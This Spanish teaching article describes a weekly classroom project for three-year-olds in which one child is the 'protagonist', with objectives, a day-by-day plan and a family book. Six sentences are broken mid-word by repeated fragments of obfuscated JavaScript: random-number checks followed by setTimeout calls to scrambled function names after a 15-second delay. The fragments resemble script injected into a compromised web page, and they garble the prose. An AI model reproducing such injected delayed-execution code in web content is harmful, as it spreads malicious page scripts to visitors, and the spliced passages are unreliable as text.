PROYECTO: EL PROTAGONISTA DE LA SEMANA

Autora: María Isabel Gamero Pardo

          En este artículo se expone un proyecto de carácter anual: EL PROTAGONISTA DE LA SEMANA. Este proyecto resulta muy interesante y motivador para nuestros alumnos de 3 años. Al mismo tiempo requiere de la participación y colaboración de las familias, dandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando respuesta a uno de los principales objetivos de esta etapa educativa: La colaboración familia-escuela.

            El Protagonista de la semana es una novedosa propuesta educativa creada por Carmen Ibáñez Sandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andín. Sus principales objetivos son:

  • Presentar una actividad que permita al educador su utilización como recurso metodológico.
  • Facilitar la implicación familiar, como aspecto fundamental dentro de los principios organizativos.
  • Abordar de manera atractiva, dinámica e interesante todos los objetivos de la Educación Infantil.
  • Realizar la actividad de aula con originalidad y eficacia.

            Esta actividad consiste en que durante una semana un alumno de la clase se convierte en personaje principal. Se hablará de él o de ella en la asamblea y nos contará cosas suyas: gustos, preferencias, familia…, él o ella será el que hable de sí mismo y de su situación. Será el encargado de repartir fichas, hacer recados…, tendrá que realizar un esfuerzo por expresarse y ser capaz de comunicarnos sus gustos y preferencias. Paralelamente los compañeros de clase opinarán sobre el protagonista, cada uno dirá algo sobre él, cómo se comporta, cómo es…


        Es una actividad flexible y requiere la máxima colaboración por parte de padres y educadores.

        Entre los objetivos que pretendemos alcanzar con nuestros alumnos podemos destacar:

  1. Desarrollar y potenciar las relaciones entre los iguales.
  2. Experimentar sentimientos de pertenencia y arraigo en un mundo social y cultural, para la participación autónoma y creativa en la sociedad.
  3. Disfrutar descubriendo su propia vida.
  4. Conocer su propio cuerpo y desarrollar su esquema corporal.
  5. Descubrir sus propias posibilidades expresivas.
  6. Observar y explorar su entorno natural y social.
  7. Participar en distintas actividades con otros niños y adultos.

 

PLAN DE TRABAJO

¿Qué pretendemos? 

  • Presentar una actividad que permita acercarnos a cada niño de forma individual, respetandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sus gustos, características, nivel de aprendizaje…, de forma que el niño se sienta PROTAGONISTA Y FELIZ.
  • Facilitar la implicación familiar en la educación de sus hijos.
  • Que el niño aprenda de su propia experiencia y del diálogo con los demás.

 

¿Cómo nos organizamos? 

  • Cada día de la semana organizaremos algo especial y desde casa tendrán que co-participar previamente con los niños.

 

LUNES 

  • Saludos, el niño saludará a cada compañero dándole la mano y diciendo “¡Buenos días!”
  • Trae a clase, de la farmacia o apuntado por sus padres, su peso.
  • Se mide en clase.
  • Los compañeros dicen cómo es por fuera el PROTAGONISTA.
  • El niño trae la fotografía de su familia y, durante el tiempo de asamblea, nos cuenta cosas sobre él.

  

MARTES 

  • Trae a la clase el juguete con el que le encanta jugar.
  • Nos habla de su comida favorita y de su color preferido.
  • Todos los niños colorean con pintura de dedos la silueta del Protagonista realizada sobre papel continuo.

 

MIÉRCOLES 

  • Trae a clase el LIBRO VIAJERO realizado en casa, en el que podremos ver fotos que nos explicarán su HISTORIA PERSONAL, detallandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando lugar, actividad que realizaba, personas que le acompañan,…
  • Hablamos del Protagonista y lo dibujamos.

 

JUEVES 

  • El PROTAGONISTA puede traer un cuento, una canción, un dibujo, enseñarnos un baile, un CD, un vídeo, etc.
  • Sus papás vienen a clase y nos cuentan cosas del protagonista.

 

VIERNES 

  • Este día el PROTAGONISTA se calla y son sus compañeros los que recuerdan las cosas que han aprendido de él y de su familia.
  • Los niños describen al protagonista y dibujan su retrato.
  • Entregamos el Libro del Protagonista que hemos elaborado sobre el Protagonista.
  • Entregamos el Diploma al Protagonista.

  

EL LIBRO DEL PROTAGONISTA (partes que debe tener)

  • Mi libro del protagonista: nombre del niño, su foto, fecha y lugar de nacimiento.
  • Mi nombre.
  • Este soy yo: Dibujo que hizo de sí mismo.
  • Esta es mi familia: dibujos o foto de su familia.
  • Así me ven mis amigos: dibujos realizados por los compañeros.
  • Estos son mis mejores amigos: dibujo realizado por el protagonista sobre sus mejores amigos.
  • La historia de mi vida para mis amigos: fotos de los acontecimientos más importantes de su vida.
  • Las huellas de mis manos son: pondremos la silueta de sus manos estampadas con témpera.
  • Las huellas de mis pies son: pondremos la silueta de sus pies estampadas con témpera.
  • Mido: escribirá su medida junto al dibujo de su cuerpo.
  • Me gusta: recopilación de las comidas que más le gustan, de su color favorito, sus juegos y programas de TV preferidos…

 

OTRAS ACTIVIDADES QUE PUEDE REALIZAR EL PROTAGONISTA 

          Se llevará a la mascota de la clase durante esa semana y convivirá con él. La mascota conocerá a su familia, su casa, sus amigos y compartirá las experiencias durante esa semana (viajes, visitas, juegos…).

        Confeccionar el Libro viajero, en colaboración con la familia, recordandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando así aquellas canciones, juegos, adivinanzas, poesías, trabalenguas, retahílas, refranes… de tradición popular.


 

REFERENCIAS BIBLIOGRÁFICAS: 

  • LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207
  •  Real Decreto 1630/2006, de 29 de diciembre, por el que se establecen las enseñanzas mínimas para el segundo ciclo de Educación Infantil, Boletín Oficial del Estado, número 4 de 4/1/2007, páginas 474 a 482. 
  •  DECRETO 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm. 12, p.1226-1272.   
  • IBÁÑEZ SANDÍN, C. El proyecto de Educación Infantil y su práctica en el aula. La muralla. Madrid. 1992.

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